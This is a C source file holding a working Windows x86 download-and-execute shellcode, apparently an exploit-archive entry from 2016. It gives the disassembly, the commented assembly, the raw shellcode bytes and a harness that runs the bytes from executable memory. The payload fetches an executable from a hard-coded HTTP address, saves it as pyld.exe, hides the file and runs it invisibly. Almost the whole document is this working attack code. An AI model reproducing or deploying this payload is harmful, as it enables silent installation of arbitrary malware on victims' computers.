/*
Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
Date : 12-07-2016
Author : Roziul Hasan Khan Shifat
Tested on: Windows 7 x86 (32-bit process only: the PEB/LDR walk and the export-table offsets below are x86-specific)
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx
00000023 <count>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <count>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <count>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <count>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 f6 xor %esi,%esi
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 c0 xor %eax,%eax
53: 50 push %eax
54: 68 61 72 79 41 push $0x41797261
59: 68 4c 69 62 72 push $0x7262694c
5e: 68 4c 6f 61 64 push $0x64616f4c
63: 54 push %esp
64: 51 push %ecx
65: ff d2 call *%edx
67: 83 c4 0c add $0xc,%esp
6a: 31 c9 xor %ecx,%ecx
6c: 68 6c 6c 41 41 push $0x41416c6c
71: 88 4c 24 02 mov %cl,0x2(%esp)
75: 68 6f 6e 2e 64 push $0x642e6e6f
7a: 68 75 72 6c 6d push $0x6d6c7275
7f: 54 push %esp
80: ff d0 call *%eax
82: 83 c4 0c add $0xc,%esp
85: 31 c9 xor %ecx,%ecx
87: 68 65 41 42 42 push $0x42424165
8c: 88 4c 24 02 mov %cl,0x2(%esp)
90: 68 6f 46 69 6c push $0x6c69466f
95: 68 6f 61 64 54 push $0x5464616f
9a: 68 6f 77 6e 6c push $0x6c6e776f
9f: 68 55 52 4c 44 push $0x444c5255
a4: 54 push %esp
a5: 50 push %eax
a6: ff d6 call *%esi
a8: 83 c4 14 add $0x14,%esp
ab: 50 push %eax
000000ac <download>:
ac: 58 pop %eax
ad: 31 c9 xor %ecx,%ecx
af: 51 push %ecx
b0: 68 2e 65 78 65 push $0x6578652e
b5: 68 6d 70 6c 65 push $0x656c706d
ba: 68 30 2f 73 61 push $0x61732f30
bf: 68 36 2e 31 33 push $0x33312e36
c4: 68 36 38 2e 38 push $0x382e3836
c9: 68 39 32 2e 31 push $0x312e3239
ce: 68 3a 2f 2f 31 push $0x312f2f3a
d3: 68 68 74 74 70 push $0x70747468
d8: 54 push %esp
d9: 59 pop %ecx
da: 31 db xor %ebx,%ebx
dc: 53 push %ebx
dd: 68 2e 65 78 65 push $0x6578652e
e2: 68 70 79 6c 64 push $0x646c7970
e7: 54 push %esp
e8: 5b pop %ebx
e9: 31 d2 xor %edx,%edx
eb: 50 push %eax
ec: 52 push %edx
ed: 52 push %edx
ee: 53 push %ebx
ef: 51 push %ecx
f0: 52 push %edx
f1: ff d0 call *%eax
f3: 59 pop %ecx
f4: 83 c4 2c add $0x2c,%esp
f7: 31 d2 xor %edx,%edx
f9: 39 d0 cmp %edx,%eax
fb: 51 push %ecx
fc: 75 ae jne ac <download>
fe: 5a pop %edx
ff: 31 d2 xor %edx,%edx
101: 68 73 41 42 42 push $0x42424173
106: 88 54 24 02 mov %dl,0x2(%esp)
10a: 68 62 75 74 65 push $0x65747562
10f: 68 74 74 72 69 push $0x69727474
114: 68 69 6c 65 41 push $0x41656c69
119: 68 53 65 74 46 push $0x46746553
11e: 54 push %esp
11f: 57 push %edi
120: ff d6 call *%esi
122: 83 c4 14 add $0x14,%esp
125: 31 c9 xor %ecx,%ecx
127: 51 push %ecx
128: 68 2e 65 78 65 push $0x6578652e
12d: 68 70 79 6c 64 push $0x646c7970
132: 54 push %esp
133: 59 pop %ecx
134: 31 d2 xor %edx,%edx
136: 83 c2 02 add $0x2,%edx
139: 52 push %edx
13a: 51 push %ecx
13b: ff d0 call *%eax
13d: 83 c4 08 add $0x8,%esp
140: 31 c9 xor %ecx,%ecx
142: 68 78 65 63 41 push $0x41636578
147: 88 4c 24 03 mov %cl,0x3(%esp)
14b: 68 57 69 6e 45 push $0x456e6957
150: 54 push %esp
151: 57 push %edi
152: ff d6 call *%esi
154: 83 c4 08 add $0x8,%esp
157: 31 c9 xor %ecx,%ecx
159: 51 push %ecx
15a: 68 2e 65 78 65 push $0x6578652e
15f: 68 70 79 6c 64 push $0x646c7970
164: 54 push %esp
165: 59 pop %ecx
166: 31 d2 xor %edx,%edx
168: 52 push %edx
169: 51 push %ecx
16a: ff d0 call *%eax
16c: 83 c4 08 add $0x8,%esp
16f: 31 c9 xor %ecx,%ecx
171: 68 65 73 73 41 push $0x41737365
176: 88 4c 24 03 mov %cl,0x3(%esp)
17a: 68 50 72 6f 63 push $0x636f7250
17f: 68 45 78 69 74 push $0x74697845
184: 54 push %esp
185: 57 push %edi
186: ff d6 call *%esi
188: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;Eax=PEB
mov eax,[eax+0xc] ;eax=PEB.Ldr
mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemoryOrderModuleList.Flink (first module entry)
lodsd ;step to the second entry
xchg esi,eax
lodsd ;step to the third entry
mov ecx,[eax+0x10] ;ecx=kernel32.dll base address (DllBase, read relative to the entry's InMemoryOrderLinks)
;NOTE: no module name is compared. This assumes the in-memory order exe -> ntdll -> kernel32,
;which holds on the tested Win7 x86 build; any other load order silently yields a different module's base.
;------------------------------------
mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_lfanew (RVA of the PE header)
add ebx,ecx ;ebx=PE HEADER
mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;------------------------------------------
;Locate GetProcAddress by scanning AddressOfNames. Only the 12-byte prefix
;"GetProcAddre" is compared; that still selects GetProcAddress because the name
;table is sorted alphabetically and it precedes any longer export with the same
;prefix. The scan is NOT bounded by NumberOfNames: if the name were absent it
;would keep reading past the table until something matched or the access faulted.
xor edx,edx
count:
inc edx ;after the match edx = name index + 1
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz count
cmp dword [eax+4],'rocA'
jnz count
cmp dword [eax+8],'ddre'
jnz count
;---------------------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4] ;indexed with (name index + 1); AddressOfNameOrdinals (+0x24) is never consulted
add edx,ecx ;edx=GetProcAddress()
;NOTE: this shortcut is only right when AddressOfNameOrdinals[i] == i+1 for GetProcAddress.
;The author reports it working on Win7 x86; the portable form reads the ordinal table first.
;-----------------------------------------
xor esi,esi
mov esi,edx ;GetProcAddress()
mov edi,ecx ;kernel32.dll
;------------------------------------
;finding address of LoadLibraryA()
xor eax,eax
push eax
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ecx
call edx
;------------------------
add esp,12
;-----------------------------
;LoadLibraryA("urlmon.dll")
xor ecx,ecx
push 0x41416c6c
mov [esp+2],byte cl
push 0x642e6e6f
push 0x6d6c7275
push esp
call eax
;-----------------------
add esp,12
;-----------------------
;finding address of URLDownloadToFileA()
xor ecx,ecx
push 0x42424165
mov [esp+2],byte cl
push 0x6c69466f
push 0x5464616f
push 0x6c6e776f
push 0x444c5255
push esp
push eax
call esi
;------------------------
add esp,20
push eax
;---------------------------------------
;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
pop eax
xor ecx,ecx
push ecx
;-----------------------------
;change this to the payload URL (8 dwords, NUL-terminated by the push ecx above).
;It is plain HTTP with no TLS and no integrity check: whatever the server returns is executed below.
push 0x6578652e
push 0x656c706d
push 0x61732f30
push 0x33312e36
push 0x382e3836
push 0x312e3239
push 0x312f2f3a
push 0x70747468
;-----------------------------------
push esp
pop ecx ;url http://192.168.86.130/sample.exe
xor ebx,ebx
push ebx
;------------------------
;save-as name "pyld.exe" (pushed again for SetFileAttributesA and WinExec below; change all three copies together)
push 0x6578652e
push 0x646c7970
;-------------------------------
push esp ;pyld.exe
pop ebx ;save as
xor edx,edx
push eax
push edx
push edx
push ebx
push ecx
push edx
call eax
;-------------------------
pop ecx ;recover the URLDownloadToFileA pointer pushed ahead of the arguments
add esp,44 ;discard the URL/save-as strings (48 bytes were pushed, so 4 bytes stay behind per attempt)
xor edx,edx
cmp eax,edx ;S_OK (0) means the file was written
push ecx
jnz download ;if the download fails, retry continuously: no limit and no delay, so an unreachable server spins here forever
;------------------
pop edx
;-----------------------
;Finding address of SetFileAttributesA()
xor edx,edx
push 0x42424173
mov [esp+2],byte dl
push 0x65747562
push 0x69727474
push 0x41656c69
push 0x46746553
push esp
push edi
call esi
;--------------------------------
add esp,20 ;pop the 5 dwords of name string: GetProcAddress is stdcall and removes only its own two arguments, so the stack would otherwise be left 20 bytes off
;--------------------
;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
add edx,2 ;FILE_ATTRIBUTE_HIDDEN
push edx
push ecx
call eax
;-------------------
add esp,8
;---------------------------
;finding address of WinExec()
xor ecx,ecx
push 0x41636578
mov [esp+3],byte cl
push 0x456e6957
push esp
push edi
call esi
;----------------------
add esp,8
;------------------------
;calling WinExec("pyld.exe",0) -- uCmdShow 0 is SW_HIDE; the bare name is resolved against the current directory, which should also be where URLDownloadToFileA wrote it unless the directory changed in between
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
push edx
push ecx
call eax
;-------------------------
add esp,8
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
push esp
push edi
call esi
;--------------
call eax ;ExitProcess(): no exit code was pushed, so the dword on top of the stack (the name string) becomes the exit code
*/
#include<stdio.h>
#include<string.h>
#ifdef _WIN32
#include<windows.h> /* VirtualAlloc()/GetLastError(): executable memory for the payload */
#endif
/*
 * Payload bytes, in the order shown in the disassembly above (0x18a = 394
 * bytes per that listing, ending in `call *%eax`). Declared as a plain char
 * string so that main() can report its length with strlen(); that only works
 * because the encoding contains no 0x00 byte (the NUL-sensitive spots are
 * patched at run time by the `mov [esp+N],byte cl/dl` stores). Hard-coded
 * inside: the download URL (http://192.168.86.130/sample.exe) and the save-as
 * name "pyld.exe" -- regenerate the bytes if either is changed.
 */
char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";
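/*
 * Test harness: report the payload length, then hand control to it.
 *
 * Returns 0 only if the payload returns (it normally does not: its last
 * action is a call to ExitProcess()), 1 on a setup failure or on a host
 * that cannot run it.
 *
 * The payload starts by reading fs:[0x30], the Windows x86 PEB, so it is
 * only meaningful in a 32-bit Windows process. Jumping straight into the
 * `shellcode` array (the original `(*(int(*)())shellcode)()`) faults under
 * DEP/NX because .data is not executable; the Windows path therefore copies
 * the bytes into a fresh PAGE_EXECUTE_READWRITE allocation first.
 */
int main(void)
{
    /* sizeof() - 1 is the real byte count; strlen() stops at the first 0x00,
     * and a NUL inside a string-delivered payload is almost always a bug. */
    size_t len = sizeof(shellcode) - 1;
    size_t visible = strlen(shellcode);
#ifdef _WIN32
    void *exec;
#endif

    /* %ld with a cast rather than %zu: the MSVCRT printf used by older
     * MinGW builds does not understand %zu. */
    printf("shellcode length %ld\n", (long)visible);
    if (visible != len) {
        printf("warning: payload contains a NUL at offset %ld; a string-based loader would truncate it\n",
               (long)visible);
    }

#ifdef _WIN32
    exec = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        printf("VirtualAlloc failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }
    memcpy(exec, shellcode, len);
    ((void (*)(void))exec)();
    return 0;
#else
    printf("this payload targets Windows x86 only; refusing to run it on this host\n");
    return 1;
#endif
}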